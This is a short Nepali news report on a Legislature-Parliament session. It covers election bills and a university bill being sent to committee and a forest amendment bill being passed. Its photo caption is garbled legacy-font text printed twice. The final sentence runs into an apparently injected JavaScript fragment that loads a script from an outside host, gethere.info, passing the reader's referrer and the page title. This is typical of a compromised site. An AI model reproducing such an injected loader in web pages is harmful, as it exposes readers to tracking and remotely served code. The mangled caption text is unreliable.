काठमाडौँ, असोज ३० । व्यवस्थापिका–संसद्को आजको बैठकमा निर्वाचनसँग सम्बन्धित तीन विधेयक दफाबार छलफलका लागि सम्बन्धित समितिमा पठाइयोस् भन्ने प्रस्ताव सर्वसम्मतिले स्वीकृत भएको छ ।
बैठकमा कावा प्रधानमन्त्री विमलेन्द्र निधिले ती विधेयक दफाबार छलफलका लागि सम्बन्धित समितिमा पठाइयोस् भन्ने प्रस्ताव प्रस्तुत गरेका थिए ।

;+;bLo ;'g'jfO ;ldltsf] a}7s Joj:yflksf–;+;bcGtu{tsf] ;+;bLo ;'g'jfO ;ldltsf] a}7s l;+xb/af/df cfOtaf/ a:b} . tl:a/ M k|bLk/fh jGt, /f;;

;+;bLo ;’g’jfO ;ldltsf] a}7s
Joj:yflksf–;+;bcGtu{tsf] ;+;bLo ;’g’jfO ;ldltsf] a}7s l;+xb/af/df cfOtaf/ a:b} . tl:a/ M k|bLk/fh jGt, /f;;

स्वीकृत विधेयकमा ‘राजनीतिक दलसम्बन्धी विधेयक, २०७३’, ‘मतदाता नामावली विधेयक, २०७३’ र ‘निर्वाचन आयोग विधेयक, २०७३’ छन् । ती विधेयकको गम्भीरतालाई ध्यानमा राखी तदारुकताका साथ संसद्को नियमावली, २०७३ बमोजिम सम्बन्धित समितिमा खुला छलफल गर्न सभामुखले सभाको सहमतिसहितको निर्देशन दिनुभएको छ ।
जनक विश्वविद्यालय विधेयक
शिक्षामन्त्री धनीराम पौडेलले प्रस्तुत गरेको ‘राजर्षि जनक विश्वविद्यालय विधेयक, २०७३’ लाई दफाबार छलफलका लागि सम्बन्धित समितिमा पठाइयोस् भन्ने प्रस्ताव पनि बैठकले स्वीकृत गरेको छ ।
त्यस्तै वन तथा भूसंरक्षणमन्त्री शङ्कर भण्डारीले प्रस्तुत गरेको ‘वातावरण संरक्षण समितिको प्रतिवेदसहितको वन (दोस्रो संशोधन) विधेयक, २०७३’ सर्वसम्मतिबाट पारित भएको छ ।s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;